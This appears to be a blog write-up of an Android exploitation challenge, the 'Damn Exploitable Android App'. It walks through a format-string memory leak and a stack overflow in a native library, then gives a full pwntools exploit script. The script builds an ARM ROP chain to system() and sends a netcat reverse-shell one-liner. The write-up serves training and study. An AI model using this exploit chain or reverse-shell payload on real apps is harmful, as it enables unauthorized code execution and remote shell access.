Android Native Library Exploitation Challenge

July 12, 2023 // echel0n


Introduction

Hello guys! It's been a while. I hope you all are enjoying the summer. I had a great holiday for the first time in years. Before the holiday, I've had my eye on the challenge that is published by mobilehackinglab.com, Umit Aksu. Came back and worked on this enjoyable challenge. This challenge covers format string and stack overflow vulnerabilities.

Static Analysis of Java Code

Im taking shortcuts in here, you guys already know about jadx,apktool etc. The challenge has one activity and looks like we have a server and external functions.

  1. public static final int SERVERPORT = 6000;
  2. // External Functions from native library...
  3. public native String leakMemory(byte[] bArr);
  4. public native void overFlow(byte[] bArr, int i);
  5. public native String stringFromJNI();
  6. static {
  7. System.loadLibrary("native-lib");
  8. }
  1. this.output.write(MainActivity.this.leakMemory(data).getBytes("ISO_8859_1"));

The activity gets 1024 length bytes from remote connection, then the input goes into leakMemory() function as the first parameter and prints out the data to remote.

  1. mainActivity.overFlow(data, mainActivity.readBytes)

Then, the data also goes into overFlow function as firm parameter, second parameter is the length of the data, I assume. (I did not check it) Let's look at the native library.

Static Analysis of Native Library

Whenever I open something in IDA or Cutter, my CTF sense always tingles. Oftenly, I just look up the string table if there are something useful. For this time, I found these strings;

  1. - You won!
  2. - EXPLOITSTATUS

When I checked the x-refs I found this function (disasm /w rizin-ghidra);

  1. void printLog()(void) // 0x00018e70
  2. {
  3. int16_t var_8h;
  4. // printLog()
  5. __android_log_print(2, "EXPLOITSTATUS", "You won! ");
  6. return;
  7. }

This function has no params and does not get called at anywhere. So, I think that our goal is we need to return to this address, somehow? idk. It would be more clear if I just went directly to overFlow and leakMemory functions, right? (lol) Let's do the right thing and look at first function!

MainActivity.this.leakMemory(data)

I tried to rename called functions and trimmed the function a little bit;

  1. _data = arg1;
  2. _s = 0;
  3. uVar2 = GetByteArrayElements(_data, _var_14h, &var_49h);
  4. snprintf(&s, 0x28, uVar2);
  5. // For recall: snprintf(char *s,
  6. // size_t size,
  7. // const char *format,
  8. // va_list args);
  9. basic_string(&var_20h, &s);
  10. iVar1 = _data;
  11. uVar2 = fcn.00008fd8((int16_t)&var_8h + -0x18);
  12. uVar2 = NewStringUTF(iVar1, uVar2);
  13. basic_string_2(&var_20h);

The function gets the supplied input into snprintf which is vulnerable to format string attack. This vulnerability can lead to arbitrary write and read data at a random address. Let's test it from our emulator then!

  1. generic:/ $ nc localhost 6000
  2. Welcome to Damn Exploitable Android App!%p %p %p %p %p %s
  3. 0xb3332252 0x0 0xb1bac700 0x0 0x85b0400

Nice! Let's find out what mainActivity.overFlow(data, mainActivity.readBytes) does.

  1. // trimmed ...
  2. _var_18h = (int32_t)arg4;
  3. _array_type = (int32_t)arg3;
  4. _var_10h = (int32_t)arg2;
  5. _data = (int32_t)arg1;
  6. uVar1 = GetByteArrayElements(_data, _array_type, &uStack_19);
  7. _cp(uVar1, _var_18h);
  8. // What _cp does?
  9. void cp(char *param_1,int param_2){
  10. undefined auStack_d8 [200];
  11. int local_10;
  12. char *local_c;
  13. local_10 = param_2;
  14. local_c = param_1;
  15. __aeabi_memclr(auStack_d8,200);
  16. if ((((0 < local_10) && (*local_c == '0')) && (local_c[1] == 'x')) &&
  17. ((local_c[2] == 'f' && (local_c[3] == 'a')))) {
  18. __aeabi_memcpy(auStack_d8,local_c,local_10);
  19. }
  20. return;
  21. }
  1. 1) Checks if the second param is greater than > 0
  2. 2) Checks if the data starts with 0xfa
  3. 3) Copies the data to stack without checking the size

Verify this behaviour with an input starts with "0xfa" and a lot of strings. Logcat shows this SIGSEGV;

  1. 07-09 03:11:59.964 23942 23942 F DEBUG : pid: 23900, tid: 23929, name: Thread-3 >>> com.example.mynativetest
  2. 07-09 03:11:59.965 23942 23942 F DEBUG : signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x41414140
  3. 07-09 03:11:59.965 23942 23942 F DEBUG : r0 9affff78 r1 abb8fe68 r2 00000001 r3 0000000a
  4. 07-09 03:11:59.966 23942 23942 F DEBUG : r4 b5b7e194 r5 9b0003a8 r6 9b000178 r7 41414141
  5. 07-09 03:11:59.966 23942 23942 F DEBUG : r8 9b000178 r9 b1bac200 sl 00000000 fp 9b000104
  6. 07-09 03:11:59.966 23942 23942 F DEBUG : ip 40000000 sp 9b000050 lr b1d01e63 pc 41414140 cpsr 00000030
  7. 07-09 03:11:59.976 23942 23942 F DEBUG :

Yeah, pretty much about it. Let's review our findings so far. What we need for successful exploitation?

  1. 1) Memory leaks (We can leak bunch of memory addresses with format string vulnerability!)
  2. 2) Arbitrary Read/Write (We can overflow the stack then overwrite known addresses!)
  3. 3) IP Control (We also already have it!)

Before diving deep into memory kung-fu, we also have a more simple goal. Let's try to jump to winner function.

The Action

With the help of beatiful plugin "peda-arm", we can easily interrupt the application and look where the library is located in memory;

  1. peda-arm > vmmap libnative
  2. Start End Perm Name
  3. 0xb1cf9000 0xb1d12000 r-xp /data/app/com.example.mynativetest-1/lib/arm/libnative-lib.so
  4. 0xb1d12000 0xb1d14000 r--p /data/app/com.example.mynativetest-1/lib/arm/libnative-lib.so
  5. 0xb1d14000 0xb1d15000 rw-p /data/app/com.example.mynativetest-1/lib/arm/libnative-lib.so

We also can brute-force manually little bit what-is-where with format string vulnerability.

I picked the %26$p value which is (also verified in another session)

  1. $26 := 0xa96e3398 && $26 = 0xb1be3398
  2. For both values above;
  3. In [11]: hex(0xb1bf4000 - 0xb1be3398)
  4. Out[11]: '0x10c68'
  5. In [13]: hex( 0xa96f4000 - 0xa96e3398)
  6. Out[13]: '0x10c68'

So bingo! We found our first consistent gem for calculating where the library memory is mapped. But I could not manage to print that memory region, I mean my "arm-none-eabi-gdb" was not printing(x/i) true assembly lines, so I searched for the bytes to be sure.

  1. peda-arm > searchmem "\x6f\x46" 0xa96f4000 0xa9710000 # it's: 00018e72 6f 46 mov r7,sp
  2. [*] Searching for 'oF' in range: 0xa96f4000 - 0xa9710000
  3. Found 113 results, display max 113 items:
  4. ....
  5. libnative : 0xa96fce72
  6. In [20]: hex( 0xa96fce72 - 0xa96f4000)
  7. Out[20]: '0x8e72'

Finally, do we need all the information for the quick win? Let's see about that. I prepared my payload like this;

  1. junk = b"0xfa" # it's the string that binary looks for.
  2. junk += b"\x42" * 208 # two more bytes
  3. # 00018e6c 34 b0 add sp,#0xd0
  4. # 00018e6e 80 bd pop {r7,pc}
  5. r.sendline(junk+printlog_address)


Yey! Got the easy one.

Real Deal

With the power of free memory leaks, sure that we can do something better than this. To make it easier to use those and figure out what leaked memories are holding, I just printed out the values as much I can;

  1. def find_interesting_addr():
  2. for i in range(0, 0xff):
  3. response = getleak(i).decode()
  4. if response != "0x0" and not response in unique_leaks:
  5. unique_leaks.append(response)
  6. print(f"${i} := {response}")

And the output was something like this;

  1. $0 := $p
  2. $1 := 0xa5032252
  3. $3 := 0xa46a2200
  4. $5 := 0x8c407c00
  5. $8 := 0x8c409400
  6. $9 := 0x1fd1070
  7. $23 := 0x8c5ff4c0
  8. $24 := 0x8c5ff4bc
  9. $25 := 0x98d86560
  10. $26 := 0xa38e3398
  11. $27 := 0x9dbf8c5f
  12. $28 := 0xa789b104
  13. $31 := 0x12c7f160
  14. $32 := 0x12cac800
  15. $34 := 0x12c9d190
  16. $35 := 0x1b12c7
  17. ...

So I attached gdb again, looked them what they are. I made a offset list to be more consistent. The stack leak was consistent enough, it was at %23$p. The other possible offsets are;

  1. maybe_nativelib_base = {
  2. "26": 0x10CD8 - 0x98,
  3. "55": 0x10CD8 - 0x70, # sometimes gdb breaks the alignment, idk.
  4. "60": 0x10CD8,
  5. }
  6. maybe_libc_base = {
  7. "95": 0x56999,
  8. "113": 0x61079,
  9. "121": 0x614A5,
  10. "185": 0x61AE5,
  11. }

With these leaks, we can know where the stack/libc/libnative-lib/ is. What do we need next? Yeah Gadgets!

Unlike the previous call of printLog, surely we will need to call something more advanced, especially libc's system. system() function has only one parameter, which is getting that parameter from $r0 register. We need to also set $r0 to an address which holds command string. So, we can use the +0x70470 without any side effects below;

  1. (libnative-lib.so/ELF/ARM)> search /1/ %pop {r0, pc}
  2. [INFO] Searching for gadgets: %pop {r0, pc}
  3. [INFO] File: libc.so
  4. 0x0007046c: cmnmi r0, #0; pop {r0, pc};
  5. 0x00070470: pop {r0, pc};

What are the choices to achieve getting a shell?

  1. 1) Directly getting system("/bin/sh") is not available because of the threading.
  2. 2) We are sandboxed, we can not touch other things in filesystem.
  3. 3) Making some memory pages executable with mprotect() then jump back in?(did not try it yet)
  4. 4) We have ncat mknod and our application sandboxed directory, so the challenge becomes a pentest challenge (lol)

I chose the 4th one, and then created my payload like this;

  1. # one liner sh solution, thx to PayloadsAllTheThings!
  2. /system/bin/rm -f /data/data/com.example.mynativetest/f; /system/bin/mknod /data/data/com.example.mynativetest/f p;/system/bin/cat /data/data/com.example.mynativetest/f|/system/bin/sh -i 2>&1|/system/xbin/nc localhost 4444 >/data/data/com.example.mynativetest/f

Note: Beware the "nc localhost 4444" command. I did "adb reverse tcp:4444 tcp:4444" to avoid networking issues. The port can be handled from the host machine.

I put this shell command string into stack. Since I know where the stack is already, I can calculate it's relative address without hesitation. Finally, our payload became something like this;

  1. payload = (pop_r0_pc
  2. + p32(remote_shell_code_addr)
  3. + p32(system)
  4. + remote_shell_code
  5. )
The steps are;
  1. 0) nc -nvlp 4444 on the host machine
  2. 1) Get libc leak (try each offset 95,113,121,185)
  3. 2) Get stack leak (from %23$p)
  4. 3) Send the payload
  1. #!/usr/bin/env python
  2. from pwn import *
  3. import warnings
  4. from sys import exit
  5. warnings.filterwarnings("ignore", category=BytesWarning)
  6. context.binary = "/home/dante/dbgtmp/libnative-lib.so"
  7. context.arch = "arm"
  8. # adb -a noademon server start
  9. # adb forward tcp:6000 tcp:6000
  10. # adb remote tcp:4444 tcp:4444 to get rid of routing problems
  11. # adb shell am start -N com.example.mynativetest/.MainActivity
  12. remote_shell_code = b"/system/bin/rm -f /data/data/com.example.mynativetest/f;/system/bin/mknod /data/data/com.example.mynativetest/f p;/system/bin/cat /data/data/com.example.mynativetest/f|/system/bin/sh -i 2>&1|/system/xbin/nc localhost 4444 >/data/data/com.example.mynativetest/f\x00"
  13. # test with touch if the command is working
  14. # remote_shell_code = b"/system/bin/touch /data/data/com.example.mynativetest/exampl\x00"
  15. SRV = "192.168.184.1"
  16. PORT = 6000
  17. r = remote(SRV, PORT)
  18. native_lib = ELF("/home/dante/dbgtmp/libnative-lib.so")
  19. libc_lib = ELF("/home/dante/dbgtmp/libc.so")
  20. maybe_nativelib_base = {
  21. "26": 0x10CD8 - 0x98,
  22. "55": 0x10CD8 - 0x70,
  23. "60": 0x10CD8,
  24. }
  25. maybe_libc_base = {
  26. "95": 0x56999,
  27. "113": 0x61079,
  28. "121": 0x614A5,
  29. "185": 0x61AE5,
  30. }
  31. unique_leaks = list()
  32. # get header
  33. r.recvuntil("Welcome to Damn Exploitable Android App!")
  34. def getleak(idx):
  35. r.clean(0.1)
  36. r.sendline(f"%{idx}$p")
  37. the_leak = r.recvline()[:-1]
  38. return the_leak
  39. def send_line(payload):
  40. log.info(f"payload := {repr(payload)}")
  41. r.send(payload)
  42. return r.recv()
  43. def ooverflow_to_win(payload):
  44. sled = b"0xfa" # it's the string that binary looks for.
  45. sled += b"\x41" * (208)
  46. sled += payload
  47. r.send(sled)
  48. def find_interesting_addr():
  49. for i in range(0, 120):
  50. response = getleak(i).decode()
  51. if response != "0x0" and not response in unique_leaks:
  52. unique_leaks.append(response)
  53. print(f"${i} := {response}")
  54. def winner():
  55. nativelib_base = 0xFFF
  56. for addr, offset in maybe_nativelib_base.items():
  57. response = getleak(int(addr)).decode()
  58. nativelib_base = int(response, 16) + offset
  59. if (nativelib_base & 0xFFF) == 0x0:
  60. break
  61. if (nativelib_base & 0xFFF) == 0x0:
  62. native_lib.address = nativelib_base
  63. else:
  64. log.failure(f"Something is wrong! {hex(native_lib.address)}")
  65. exit(1)
  66. winner_function_addr = p32(native_lib.symbols["_Z8printLogv"])
  67. print(f"libnative-lib.so base: {hex(nativelib_base)}")
  68. print(f"winner_function_addr: {hex(u32(winner_function_addr))}")
  69. strn = ooverflow_to_win((winner_function_addr))
  70. print(r.recv())
  71. def real_deal():
  72. r.can_recv()
  73. nativelib_base = 0xFFF
  74. libc_base = 0xFFF
  75. for addr, offset in maybe_nativelib_base.items():
  76. response = getleak(int(addr)).decode()
  77. nativelib_base = int(response, 16) + offset
  78. print(hex(nativelib_base))
  79. if (nativelib_base & 0xFFF) == 0x0:
  80. break
  81. if (nativelib_base & 0xFFF) == 0x0:
  82. native_lib.address = nativelib_base
  83. else:
  84. log.failure(f"Native lib base: Something is wrong! {hex(native_lib.address)}")
  85. exit(1)
  86. for addr, offset in maybe_libc_base.items():
  87. response = getleak(int(addr)).decode()
  88. libc_base = int(response, 16) - offset
  89. if (libc_base & 0xFFF) == 0x0:
  90. break
  91. if (libc_base & 0xFFF) == 0x0:
  92. libc_lib.address = libc_base
  93. else:
  94. log.failure(f"Libc lib base: Something is wrong! {hex(libc_lib.address)}")
  95. print(hex(libc_base))
  96. exit(1)
  97. response = getleak(int(23)).decode()
  98. remote_shell_code_addr = int(response, 16) + (0x28 - 0x50)
  99. #bin_sh = next(libc_lib.search(b"/system/bin/sh"))
  100. #log.info(f"bin/sh: {hex(bin_sh)}")
  101. system = libc_lib.symbols["system"]
  102. log.info(f"libnative-lib.so base: {hex(nativelib_base)}")
  103. log.info(f"libc.so base: {hex(libc_base)}")
  104. log.info(f"system: {hex(system)}")
  105. log.info(f"remote_shell_code_addr: {hex(remote_shell_code_addr)}")
  106. pop_r0_pc = p32(libc_lib.address + 0x00070470) # 0x00070470: pop {r0, pc};
  107. payload = pop_r0_pc + p32(remote_shell_code_addr) + p32(system) + remote_shell_code
  108. ooverflow_to_win(payload)
  109. r.interactive()
  110. def main():
  111. # find_interesting_addr()
  112. # winner()
  113. real_deal()
  114. if __name__ == "__main__":
  115. main()



References & Links

  1. 1) https://github.com/mobilehackinglab/damn-exploitable-android-app-public-apk/
  2. 2) https://www.mobilehackinglab.com/blog/damn-exploitable-android-app
  3. 3) https://azeria-labs.com/return-oriented-programming-arm32/
  4. 4) https://infosecwriteups.com/rop-chains-on-arm-3f087a95381e
  5. 5) https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox
  6. 6) https://blog.3or.de/arm-exploitation-defeating-dep-executing-mprotect.html

Thank you for reading my write-up! Have a nice day absolute legends!